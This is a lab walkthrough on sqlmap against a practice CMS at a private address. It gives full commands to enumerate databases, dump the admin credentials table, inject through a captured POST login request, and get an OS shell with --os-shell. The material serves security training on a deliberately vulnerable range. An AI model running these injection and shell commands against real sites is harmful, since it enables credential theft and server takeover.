sqlmap basic combat
Article directory
Quick check of sqlMap parameters
parameter | meaning |
---|---|
-u | Detect injection point |
–dbs | list all library names |
–current-user | The name of the currently connected database user |
–current-db | the name of the current database |
-D “cms” –tables | Specify the target database as cms to list all table names in the database |
-T “cms_users” | Specify the target table name as 'cms_users' |
–columns -C ‘username,password’ | List all field names specifying the target field |
–dump -r | List field content read HTTP request from file |
–os-shell | In certain cases, the target system Shell can be obtained directly |
–level 3 | Set sqlmap detection level 3 |
–cookie=”username=admin” | Carry cookie information for injection |
-g –batch | Use the google search engine to automatically search for injection points using the default options |
–random-agent | Use Random User-Agent Information |
-v 3 | show payload |
Range address
PHP environment: phpstudy20261103.exe
Range: cms
Collection address: Link: https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?pwd=jap0
Extraction code: jap0
Obtain the website background administrator password
Use sqlmap injection to get the account password of the background administrator of the website
Find the current website's database
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" --dbs
[External link picture transfer failed, the source site may have an anti-theft link mechanism, it is recommended to save the picture and upload it directly (img-6TtOpOXv-1692887656050)(https://gitee.com/yuan_boss/yuanboss-pic-bed/raw/master /img2/image-20230824171820918.png)]
find current database
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" --current-db
Find tables in cms
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" -D "cms" --tables
[External link picture transfer failed, the source site may have an anti-theft link mechanism, it is recommended to save the picture and upload it directly (img-zVgfIczH-1692887656051)(https://gitee.com/yuan_boss/yuanboss-pic-bed/raw/master /img2/image-20230824172345144.png)]
Find fields in the cms_users table
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" -D "cms" -T "cms_users" --columns
get admin password
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" -D "cms" -T "cms_users" -C "username,password" --dump
md5 decryption
Ciphertext:e10adc3949ba59abbe56e057f2
post injection
post injection, login box
When I came to this interface, after trying the password to log in, I found that it was a post request, so I needed to use BP to capture the packet
Here is the captured package:
POST /cms/cms/admin/login.action.php HTTP/1.1
Host: 10.9.75.168
Content-Length: 51
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.9.75.168
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.9.75.168/cms/cms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: username=admin; HFS_SID_=0.912836692063138; PHPSESSID=a71e5r7upv1jm86jc01kvaius2
Connection: close
username=admin&image.x=55&image.y=19&password=admin
Create post.txt in kali, then put this package into post.txt
Post injection through the -r parameter of sqlmap
find current database
python3 sqlmap -r /tmp/post.txt --current-db
Find tables in cms
python3 sqlmap -r /tmp/post.txt -D "cms" --tables
Find fields in the cms_users table
python3 sqlmap -r /tmp/post.txt -D "cms" -T "cms_users" --columns
get admin password
python3 sqlmap -r /tmp/post.txt -D "cms" -T "cms_users" -C "username,password" --dump
md5 decryption
Ciphertext:e10adc3949ba59abbe56e057f2
sqlmap getshell
Using os-shell of sqlmap for getShell needs to meet the following conditions:
① Know the physical path of the website.
②The website path has write permission.
③sqlmap can run out of the database.
os-shell
python3 sqlmap -u "http://10.9.75.168/cms/cms/show.php?id=33" --os-shell
Select the server language as php
Assuming that the root directory of the website is known, select the second one and customize the path
Enter the absolute path of the root directory of the URL
G:/SOFT/netSecurity/soft/phpstudy2016/phstudy2016-zc/WWW
get os-shell
Excuting an order
Looking at the above results, we can see that we have successfully executed the CMD command.
Note: If the execution of the cmd command shows that an internal error has occurred, there is a high probability that it is a problem with the php version. My php version here is 5.5